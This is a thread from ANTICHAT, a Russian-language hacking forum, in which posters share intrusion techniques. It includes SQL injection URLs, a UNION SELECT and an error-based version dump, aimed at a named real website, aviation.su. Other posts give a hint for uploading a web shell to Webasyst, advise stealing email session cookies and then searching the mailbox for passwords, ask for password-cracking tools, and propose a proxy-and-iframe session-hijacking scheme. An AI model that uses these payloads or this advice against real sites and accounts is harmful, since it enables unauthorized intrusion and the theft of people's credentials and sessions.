HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22341  
Старый 14.04.2013, 22:24
skrutcher
Guest
Сообщений: n/a
Провел на форуме:
5147

Репутация: 0
По умолчанию

Цитата:
Сообщение от not_bad  
not_bad said:
Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.
берешь и проверяешь. все зависит от того как устроен сам двиг.
 
Ответить с цитированием

  #22342  
Старый 15.04.2013, 20:55
Улыбайся
Guest
Сообщений: n/a
Провел на форуме:
18621

Репутация: 3
По умолчанию

Почему не выводятся принтабельные поля?

http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+UN ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+--+
 
Ответить с цитированием

  #22343  
Старый 15.04.2013, 21:53
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Улыбайся  
Улыбайся said:
Почему не выводятся принтабельные поля?
http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+UN ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+--+
Цитата:
Сообщение от None  
http://www.aviation.su/index.php?op=modload&mod=News&na=details&id=798+or +(select+count(*)+from+(select+1+union+select+2+un ion+select+3)x+group+by+concat(version(),floor(ran d(0)*2)))--
5.0.51a-24+lenny5
 
Ответить с цитированием

  #22344  
Старый 16.04.2013, 14:20
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Как в webasyst залить шелл?
Вариант с не проходит
?

мож, нет прав на запись файлов в этот каталог, мож allow_url_fopen off
 
Ответить с цитированием

  #22345  
Старый 18.04.2013, 05:56
skrutcher
Guest
Сообщений: n/a
Провел на форуме:
5147

Репутация: 0
По умолчанию

Цитата:
Сообщение от smirk  
smirk said:
?
мож, нет прав на запись файлов в этот каталог, мож allow_url_fopen off
copy(shellurl,ПОЛНЫЙ АДРЕС)
 
Ответить с цитированием

  #22346  
Старый 18.04.2013, 23:37
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Подскажите, плизз программу для подбора паролей, зашифрованных алгоритмом varbinary(256), желательно, с использованием CUDA, Google не помог..... Почему-то
 
Ответить с цитированием

  #22347  
Старый 19.04.2013, 05:49
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от zloy_fantom  
zloy_fantom said:
Подскажите, плизз программу для подбора паролей, зашифрованных алгоритмом varbinary(256), желательно, с использованием CUDA, Google не помог..... Почему-то
Varbinary это разве хэш, а не бинарная форма записи?
 
Ответить с цитированием

  #22348  
Старый 19.04.2013, 08:22
Hracid
Guest
Сообщений: n/a
Провел на форуме:
1419

Репутация: 0
По умолчанию

Цитата:
Сообщение от not_bad  
not_bad said:
Хотябы 3 и 4 вопрос поясните плз. Если может быть по разному то как узнать как конкретно на данном сайте делается? Эта информация заложена в самих куках или только на самом сайте? Чтобы не попасть в ситуацию что перехватил куки а через день они уже не работают. Спасибо.
1. пароли в кукисах давно никто не хранит. максимум хеш пароля, но чаще id сессии. так что ты прав.

2. в том же mail.ru никак не влияет. вк и прочие тоже.. вообще из общепопулярных ресурсов не встречал пока что бы обрывал сессию из-за смены ip. хотя конечно такое возможно. но может для корпоративных ресурсов с хорошим уровнем безопасности.

3. если юзер авторизовался заново, старая сессия была закрыта, то тебя нужно будет по новой тырить куки. мой тебе совет, потырил куки от почты, получил сессию, быстро ищешь что есть в почте из паролей, весьма вероятно что один из найденых подойдет и от ящика.

4. зайти можно. можно даже зайти с разных компов. но опять же это специфически, зависит от ресурса.
 
Ответить с цитированием

  #22349  
Старый 19.04.2013, 08:26
Hracid
Guest
Сообщений: n/a
Провел на форуме:
1419

Репутация: 0
По умолчанию

мне кажется я только что изобрел велосипед, но хотелось бы пояснений от людей знающих!

В общем суть такова:

1. Поднимаем proxy на своей машине/сервере

2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxyort/http://site-name

3. Отправляем ссылку жертве

Получается вполне классический вариант атаки мэн-ин-дэ-мидл. ресурс откроется у жертвы, но через нашу проксю.

При этом важный момент, жертва уже залогинина на «site-name» у себя в браузере. Т.е. у браузера в куках есть ID сессии.

Жертва переходит по ссылке, браузер послушно передает куки на «site-name», но трафик то идет через наш proxy и мы можем с легкостью поваровать сессию.

Вроде как profit.

При этом думаю стоит различить варианты proxy:

1. Web-proxy

2. http\https proxy

3. ssl proxy

в общем хотелось бы услышать мнение, возможна ли такая атака?

Если возможна где можно почитать в подробностях.

Основной момент что жертве не надо логинится на сайт, если она уже на сайте. Это дает нам возможность спрятать «site-name» в невидимом iframe, а жертве показать картинку с котиком. Но куки то передадуться все равно, даже если сайт не виден.

Я заранее извиняюсь, но нагуглить хоть что-то похожее у меня не вышло. Видел что-то похожее в BackTrack, но там была эмуляция сайта(SeT), и надо было заставить жертву ввести логин и пароль, а в описанном мной случае мы можем получить сессию не вызывав серьезных подозрений. ну кроме странного урла конечно ) что в принципе решаемо.
 
Ответить с цитированием

  #22350  
Старый 19.04.2013, 09:22
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Hracid  
Hracid said:
мне кажется я только что изобрел велосипед, но хотелось бы пояснений от людей знающих!
В общем суть такова:
1. Поднимаем proxy на своей машине/сервере
2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxy
ort/http://site-name
3. Отправляем ссылку жертве
Получается вполне классический вариант атаки мэн-ин-дэ-мидл. ресурс откроется у жертвы, но через нашу проксю.
При этом важный момент, жертва уже залогинина на «site-name» у себя в браузере. Т.е. у браузера в куках есть ID сессии.
Жертва переходит по ссылке, браузер послушно передает куки на «site-name», но трафик то идет через наш proxy и мы можем с легкостью поваровать сессию.
Вроде как profit.
При этом думаю стоит различить варианты proxy:
1. Web-proxy
2. http\https proxy
3. ssl proxy
в общем хотелось бы услышать мнение, возможна ли такая атака?
Если возможна где можно почитать в подробностях.
Основной момент что жертве не надо логинится на сайт, если она уже на сайте. Это дает нам возможность спрятать «site-name» в невидимом iframe, а жертве показать картинку с котиком. Но куки то передадуться все равно, даже если сайт не виден.
Я заранее извиняюсь, но нагуглить хоть что-то похожее у меня не вышло. Видел что-то похожее в BackTrack, но там была эмуляция сайта(SeT), и надо было заставить жертву ввести логин и пароль, а в описанном мной случае мы можем получить сессию не вызывав серьезных подозрений. ну кроме странного урла конечно ) что в принципе решаемо.
Куки шлются только на домен, установивший их, поэтому провал.

Да и

Цитата:
Сообщение от None  
2. Формируем ссылку на атакуемый ресурс «site-name» через данный proxy. т.е. ссылка вида http://proxyort/http://site-name
Это как? Ты сам пробовал это? У меня не работает - 502 Bad gateway. Прокси, конечно же, рабочий, если его в браузере прописывать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ